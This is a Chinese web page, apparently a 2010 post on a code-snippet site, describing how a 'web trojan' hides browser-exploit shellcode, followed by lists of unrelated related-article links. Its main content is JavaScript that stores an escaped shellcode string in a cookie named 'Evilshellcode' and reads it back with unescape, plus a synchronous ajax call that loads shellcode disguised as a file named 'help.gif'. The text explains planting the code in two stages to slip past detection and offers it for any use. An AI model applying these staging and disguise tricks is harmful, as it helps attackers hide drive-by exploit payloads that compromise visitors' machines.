一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
List Information About the Binary Files Used by an Application
Jun 18 Javascript
使用闭包对setTimeout进行简单封装避免出错
Jul 10 Javascript
jquery实现多级下拉菜单的实例代码
Oct 02 Javascript
js和css写一个可以自动隐藏的悬浮框
Mar 05 Javascript
很全面的JavaScript常用功能汇总集合
Jan 22 Javascript
Node.js Streams文件读写操作详解
Jul 04 Javascript
js的OOP继承实现(必看篇)
Feb 18 Javascript
利用Plupload.js解决大文件上传问题, 带进度条和背景遮罩层
Mar 15 Javascript
Vue.js弹出模态框组件开发的示例代码
Jul 26 Javascript
three.js搭建室内场景教程
Dec 30 Javascript
C#程序员入门学习微信小程序的笔记
Mar 05 Javascript
在vue中获取微信支付code及code被占用问题的解决方法
Apr 16 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
PHP基础学习小结
2011/04/17 PHP
php多用户读写文件冲突的解决办法
2013/11/06 PHP
PHP中的闭包(匿名函数)浅析
2015/02/07 PHP
php求一个网段开始与结束IP地址的方法
2015/07/09 PHP
初识通用数据库操作类――前端easyui-datagrid,form(php)
2015/07/31 PHP
谈谈从phpinfo中能获取哪些值得注意的信息
2017/03/28 PHP
用JavaScript获取网页中的js、css、Flash等文件
2006/12/20 Javascript
使用JS操作页面表格,元素的一些技巧
2007/02/02 Javascript
Prototype1.6 JS 官方下载地址
2007/11/30 Javascript
表单提交前触发函数返回true表单才会提交
2014/03/11 Javascript
js随机生成网页背景颜色的方法
2015/02/26 Javascript
javascript中tostring()和valueof()的用法及两者的区别
2015/11/16 Javascript
jquery显示隐藏元素的实现代码
2016/05/19 Javascript
基于Bootstrap模态对话框只加载一次 remote 数据的解决方法
2017/07/09 Javascript
使用express搭建一个简单的查询服务器的方法
2018/02/09 Javascript
详解微信小程序的 request 封装示例
2018/08/21 Javascript
微信小程序中上传图片并进行压缩的实现代码
2018/08/28 Javascript
vue列表数据发生变化指令没有更新问题及解决方法
2020/01/16 Javascript
JS实现前端路由功能示例【原生路由】
2020/05/29 Javascript
VueJS实现用户管理系统
2020/05/29 Javascript
[01:06:39]DOTA2上海特级锦标赛主赛事日 - 1 胜者组第一轮#1Liquid VS Alliance第三局
2016/03/02 DOTA
python pdb调试方法分享
2014/01/21 Python
基于Python实现的微信好友数据分析
2018/02/26 Python
python中plot实现即时数据动态显示方法
2018/06/22 Python
python实现烟花小程序
2019/01/30 Python
Python实现连接MySql数据库及增删改查操作详解
2019/04/16 Python
python线程安全及多进程多线程实现方法详解
2019/09/27 Python
如何用Matlab和Python读取Netcdf文件
2021/02/19 Python
全球在线商店:BerryLook
2019/04/14 全球购物
String和StringBuffer的区别
2015/08/13 面试题
天网面试题
2013/04/07 面试题
垃圾桶标语
2014/06/24 职场文书
心得体会该怎么写呢?
2019/06/27 职场文书
pytest配置文件pytest.ini的详细使用
2021/04/17 Python
关于golang高并发的实现与注意事项说明
2021/05/08 Golang
如何搭建 MySQL 高可用高性能集群
2021/06/21 MySQL